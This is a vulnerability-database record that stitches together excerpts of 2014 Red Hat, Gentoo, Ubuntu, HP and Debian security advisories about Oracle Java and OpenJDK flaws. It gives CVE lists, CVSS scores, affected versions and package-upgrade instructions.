References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2013-6629.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-6954.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0429.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0446.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0448.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0449.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0451.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0452.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0453.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0454.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0455.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0457.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0458.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0459.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0460.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0461.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-1876.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2398.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2401.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2402.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2409.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2412.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2414.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2420.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2421.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2423.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2427.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2428.html\nhttps://access.redhat.com/security/updates/classification/#critical\nhttps://www.ibm.com/developerworks/java/jdk/alerts/\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTcndLXlSAg2UNWIIRAidtAKC2xzybC9AZogqPqbKlnVNtoXAK9gCghl3w\n7WuHx5m587mnR/PKDaPZlzw=\n=q8QV\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201502-12\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Oracle JRE/JDK: Multiple vulnerabilities\n Date: February 15, 2015\n Bugs: #507798, #508716, #517220, #525464\n ID: 201502-12\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Oracle\u0027s Java SE\nDevelopment Kit and Runtime Environment, the worst of which could lead\nto execution of arbitrary code. Please review the CVE\nidentifiers referenced below for details. \n\nImpact\n======\n\nA context-dependent attacker may be able to execute arbitrary code,\ndisclose, update, insert, or delete certain data. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Oracle JRE 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jre-bin-1.7.0.71\"\n\nAll Oracle JDK 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jdk-bin-1.7.0.71\"\n\nAll users of the precompiled 32-bit Oracle JRE should upgrade to the\nlatest version:\n\n # emerge --sync\n # emerge -a -1 -v \"\u003e=app-emulation/emul-linux-x86-java-1.7.0.71\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429\n[ 2 ] CVE-2014-0432\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0432\n[ 3 ] CVE-2014-0446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446\n[ 4 ] CVE-2014-0448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0448\n[ 5 ] CVE-2014-0449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0449\n[ 6 ] CVE-2014-0451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451\n[ 7 ] CVE-2014-0452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452\n[ 8 ] CVE-2014-0453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453\n[ 9 ] CVE-2014-0454\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0454\n[ 10 ] CVE-2014-0455\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0455\n[ 11 ] CVE-2014-0456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456\n[ 12 ] CVE-2014-0457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457\n[ 13 ] CVE-2014-0458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458\n[ 14 ] CVE-2014-0459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459\n[ 15 ] CVE-2014-0460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460\n[ 16 ] CVE-2014-0461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461\n[ 17 ] CVE-2014-0463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0463\n[ 18 ] CVE-2014-0464\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0464\n[ 19 ] CVE-2014-2397\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397\n[ 20 ] CVE-2014-2398\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398\n[ 21 ] CVE-2014-2401\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2401\n[ 22 ] CVE-2014-2402\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2402\n[ 23 ] CVE-2014-2403\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403\n[ 24 ] CVE-2014-2409\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2409\n[ 25 ] CVE-2014-2410\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2410\n[ 26 ] CVE-2014-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412\n[ 27 ] CVE-2014-2413\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2413\n[ 28 ] CVE-2014-2414\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414\n[ 29 ] CVE-2014-2420\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2420\n[ 30 ] CVE-2014-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421\n[ 31 ] CVE-2014-2422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2422\n[ 32 ] CVE-2014-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423\n[ 33 ] CVE-2014-2427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427\n[ 34 ] CVE-2014-2428\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2428\n[ 35 ] CVE-2014-2483\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2483\n[ 36 ] CVE-2014-2490\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2490\n[ 37 ] CVE-2014-4208\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4208\n[ 38 ] CVE-2014-4209\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4209\n[ 39 ] CVE-2014-4216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4216\n[ 40 ] CVE-2014-4218\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4218\n[ 41 ] CVE-2014-4219\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4219\n[ 42 ] CVE-2014-4220\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4220\n[ 43 ] CVE-2014-4221\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4221\n[ 44 ] CVE-2014-4223\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4223\n[ 45 ] CVE-2014-4227\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4227\n[ 46 ] CVE-2014-4244\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4244\n[ 47 ] CVE-2014-4247\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4247\n[ 48 ] CVE-2014-4252\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4252\n[ 49 ] CVE-2014-4262\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4262\n[ 50 ] CVE-2014-4263\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4263\n[ 51 ] CVE-2014-4264\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4264\n[ 52 ] CVE-2014-4265\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4265\n[ 53 ] CVE-2014-4266\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4266\n[ 54 ] CVE-2014-4268\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4268\n[ 55 ] CVE-2014-4288\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4288\n[ 56 ] CVE-2014-6456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6456\n[ 57 ] CVE-2014-6457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6457\n[ 58 ] CVE-2014-6458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6458\n[ 59 ] CVE-2014-6466\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6466\n[ 60 ] CVE-2014-6468\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6468\n[ 61 ] CVE-2014-6476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6476\n[ 62 ] CVE-2014-6485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6485\n[ 63 ] CVE-2014-6492\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6492\n[ 64 ] CVE-2014-6493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6493\n[ 65 ] CVE-2014-6502\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6502\n[ 66 ] CVE-2014-6503\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6503\n[ 67 ] CVE-2014-6504\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6504\n[ 68 ] CVE-2014-6506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6506\n[ 69 ] CVE-2014-6511\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6511\n[ 70 ] CVE-2014-6512\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6512\n[ 71 ] CVE-2014-6513\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6513\n[ 72 ] CVE-2014-6515\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6515\n[ 73 ] CVE-2014-6517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6517\n[ 74 ] CVE-2014-6519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6519\n[ 75 ] CVE-2014-6527\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6527\n[ 76 ] CVE-2014-6531\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6531\n[ 77 ] CVE-2014-6532\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6532\n[ 78 ] CVE-2014-6558\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6558\n[ 79 ] CVE-2014-6562\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6562\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201502-12.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. In a typical operating environment, these are of low\nsecurity risk as the runtime is not used on untrusted applets. Bugs fixed (https://bugzilla.redhat.com/):\n\n1031734 - CVE-2013-6629 libjpeg: information leak (read of uninitialized memory)\n1045561 - CVE-2013-6954 libpng: unhandled zero-length PLTE chunk or NULL palette\n1051519 - CVE-2014-0428 OpenJDK: insufficient security checks in IIOP streams (CORBA, 8025767)\n1051528 - CVE-2014-0422 OpenJDK: insufficient package access checks in the Naming component (JNDI, 8025758)\n1051699 - CVE-2014-0373 OpenJDK: SnmpStatusException handling issues (Serviceability, 7068126)\n1051823 - CVE-2013-5878 OpenJDK: null xmlns handling issue (Security, 8025026)\n1051911 - CVE-2013-5884 OpenJDK: insufficient security checks in CORBA stub factories (CORBA, 8026193)\n1051912 - CVE-2014-0416 OpenJDK: insecure subject principals set handling (JAAS, 8024306)\n1051923 - CVE-2014-0376 OpenJDK: document builder missing security checks (JAXP, 8027201, 8025018)\n1052915 - CVE-2013-5907 ICU: Layout Engine LookupProcessor insufficient input checks (JDK 2D, 8025034)\n1052919 - CVE-2014-0368 OpenJDK: insufficient Socket checkListen checks (Networking, 8011786)\n1052942 - CVE-2013-5910 OpenJDK: XML canonicalizer mutable strings passed to untrusted code (Security, 8026417)\n1053010 - CVE-2014-0411 OpenJDK: TLS/SSL handshake timing issues (JSSE, 8023069)\n1053066 - CVE-2014-0423 OpenJDK: XXE issue in decoder (Beans, 8023245)\n1053266 - CVE-2013-5896 OpenJDK: com.sun.corba.se. ============================================================================\nUbuntu Security Notice USN-2191-1\nMay 01, 2014\n\nopenjdk-6 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenJDK 6. An attacker could\nexploit these to cause a denial of service or expose sensitive data over\nthe network. An attacker could exploit these\nto expose sensitive data over the network. (CVE-2014-0453, CVE-2014-0460)\n\nA vulnerability was discovered in the OpenJDK JRE related to availability. \nAn attacker could exploit this to cause a denial of service. \n(CVE-2014-0459)\n\nJakub Wilk discovered that the OpenJDK JRE incorrectly handled temporary\nfiles. A local attacker could possibly use this issue to overwrite\narbitrary files. In the default installation of Ubuntu, this should be\nprevented by the Yama link restrictions. (CVE-2014-1876)\n\nA vulnerability was discovered in the OpenJDK JRE related to data\nintegrity. (CVE-2014-2398)\n\nA vulnerability was discovered in the OpenJDK JRE related to information\ndisclosure. An attacker could exploit this to expose sensitive data over\nthe network. (CVE-2014-2403)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n icedtea-6-jre-cacao 6b31-1.13.3-1ubuntu1~0.12.04.2\n icedtea-6-jre-jamvm 6b31-1.13.3-1ubuntu1~0.12.04.2\n openjdk-6-jre 6b31-1.13.3-1ubuntu1~0.12.04.2\n openjdk-6-jre-headless 6b31-1.13.3-1ubuntu1~0.12.04.2\n openjdk-6-jre-lib 6b31-1.13.3-1ubuntu1~0.12.04.2\n openjdk-6-jre-zero 6b31-1.13.3-1ubuntu1~0.12.04.2\n\nUbuntu 10.04 LTS:\n icedtea-6-jre-cacao 6b31-1.13.3-1ubuntu1~0.10.04.1\n openjdk-6-jre 6b31-1.13.3-1ubuntu1~0.10.04.1\n openjdk-6-jre-headless 6b31-1.13.3-1ubuntu1~0.10.04.1\n openjdk-6-jre-lib 6b31-1.13.3-1ubuntu1~0.10.04.1\n openjdk-6-jre-zero 6b31-1.13.3-1ubuntu1~0.10.04.1\n\nThis update uses a new upstream release, which includes additional bug\nfixes. After a standard system update you need to restart any Java\napplications or applets to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04398922\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04398922\nVersion: 1\n\nHPSBUX03091 SSRT101667 rev.1 - HP-UX running Java7, Remote Unauthorized\nAccess, Disclosure of Information, and Other Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-08-19\nLast Updated: 2014-08-19\n\nPotential Security Impact: Remote unauthorized access, disclosure of\ninformation, and other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified in Java Runtime\nEnvironment (JRE) and Java Developer Kit (JDK) running on HP-UX. These\nvulnerabilities could allow remote unauthorized access, disclosure of\ninformation, and other vulnerabilities. \n\nReferences:\n\nCVE-2013-6629\n\nCVE-2013-6954\n\nCVE-2014-0432\n\nCVE-2014-0446\n\nCVE-2014-0448\n\nCVE-2014-0449\n\nCVE-2014-0451\n\nCVE-2014-0452\n\nCVE-2014-0453\n\nCVE-2014-0454\n\nCVE-2014-0455\n\nCVE-2014-0456\n\nCVE-2014-0458\n\nCVE-2014-0459\n\nCVE-2014-0460\n\nCVE-2014-0461\n\nCVE-2014-1876\n\nCVE-2014-2397\n\nCVE-2014-2398\n\nCVE-2014-2401\n\nCVE-2014-2402\n\nCVE-2014-2403\n\nCVE-2014-2409\n\nCVE-2014-2412\n\nCVE-2014-2413\n\nCVE-2014-2414\n\nCVE-2014-2420\n\nCVE-2014-2421\n\nCVE-2014-2422\n\nCVE-2014-2423\n\nCVE-2014-2427\n\nCVE-2014-2428\n\nCVE-2014-2483\n\nCVE-2014-2490\n\nCVE-2014-4208\n\nCVE-2014-4209\n\nCVE-2014-4216\n\nCVE-2014-4218\n\nCVE-2014-4220\n\nCVE-2014-4221\n\nCVE-2014-4223\n\nCVE-2014-4244\n\nCVE-2014-4252\n\nCVE-2014-4262\n\nCVE-2014-4263\n\nCVE-2014-4264\n\nCVE-2014-4265\n\nCVE-2014-4266\n\nCVE-2014-4268\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.09 and earlier. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2013-6629 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-6954 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-0432 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-0446 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2014-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-0451 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0452 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0453 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-0454 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0455 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-0456 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-0458 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0459 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0460 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8\nCVE-2014-0461 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-1876 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4\nCVE-2014-2397 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-2398 (AV:N/AC:M/Au:S/C:N/I:P/A:N) 3.5\nCVE-2014-2401 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-2402 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2403 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-2409 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2014-2412 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2413 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2014-2414 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2420 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6\nCVE-2014-2421 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-2422 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-2423 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2428 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2014-2483 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-2490 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4208 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6\nCVE-2014-4209 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2014-4216 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4218 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4220 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4221 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-4223 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4244 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-4252 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-4262 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4263 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-4264 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-4265 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4266 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4268 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following Java version upgrade to resolve these\nvulnerabilities. \n\nThe upgrade is available from the following location: http://www.hp.com/java\n\nOS Version\n Release Version\n Depot Name\n\nHP-UX B.11.23, B.11.31\n JDK and JRE v7.0.10 or subsequent\n Itanium_JDK_JRE_7.0.10_Aug_2014_Java70_1.7.0.10.00_HP-UX_B.11.31_IA.depot\n\nMANUAL ACTIONS: Yes - Update\nFor Java v7.0 update to Java v7.0.10 or subsequent\n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJdk70.JDK70-COM\nJdk70.JDK70-DEMO\nJdk70.JDK70-IPF32\nJdk70.JDK70-IPF64\nJre70.JRE70-COM\nJre70.JRE70-IPF32\nJre70.JRE70-IPF32-HS\nJre70.JRE70-IPF64\nJre70.JRE70-IPF64-HS\naction: install revision 1.7.0.10.00 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 19 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\nFor the oldstable distribution (squeeze), these problems have been fixed\nin version 6b31-1.13.3-1~deb6u1. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 6b31-1.13.3-1~deb7u1. \n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 6b31-1.13.3-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 6b31-1.13.3-1. \n\nWe recommend that you upgrade your openjdk-6 packages", "sources": [ { "db": "NVD", "id": "CVE-2014-0453" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "BID", "id": "66914" }, { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "126443" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126320" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0453", "trust": 3.6 }, { "db": "BID", "id": "66914", "trust": 2.1 }, { "db": "SECUNIA", "id": "58415", "trust": 1.8 }, { "db": "SECUNIA", "id": "59307", "trust": 1.8 }, { "db": "SECUNIA", "id": "60580", "trust": 1.8 }, { "db": "SECUNIA", "id": "60117", "trust": 1.8 }, { "db": "SECUNIA", "id": "59082", "trust": 1.8 }, { "db": "SECUNIA", "id": "59255", "trust": 1.8 }, { "db": "SECUNIA", "id": "59438", "trust": 1.8 }, { "db": "SECUNIA", "id": "59675", "trust": 1.8 }, { "db": "SECUNIA", "id": "59071", "trust": 1.8 }, { "db": "SECUNIA", "id": "59104", "trust": 1.8 }, { "db": "SECUNIA", "id": "59324", "trust": 1.8 }, { "db": "SECUNIA", "id": "61050", "trust": 1.8 }, { "db": "SECUNIA", "id": "59722", "trust": 1.8 }, { "db": "SECUNIA", "id": "59250", "trust": 1.8 }, { "db": "SECUNIA", "id": "60574", "trust": 1.8 }, { "db": "SECUNIA", "id": "61264", "trust": 1.8 }, { "db": "SECUNIA", "id": "59194", "trust": 1.8 }, { "db": "SECUNIA", "id": "59023", "trust": 1.8 }, { "db": "SECUNIA", "id": "60498", "trust": 1.8 }, { "db": "SECUNIA", "id": "59653", "trust": 1.8 }, { "db": "SECUNIA", "id": "59022", "trust": 1.8 }, { "db": "SECUNIA", "id": "60003", "trust": 1.8 }, { "db": "SECUNIA", "id": "60111", "trust": 1.8 }, { "db": "SECUNIA", "id": "59436", "trust": 1.8 }, { "db": "SECUNIA", "id": "59733", "trust": 1.8 }, { "db": "JUNIPER", "id": "JSA10698", "trust": 1.8 }, { "db": "JVNDB", "id": "JVNDB-2014-002089", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201404-268", "trust": 0.7 }, { "db": "JUNIPER", "id": "JSA10659", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": 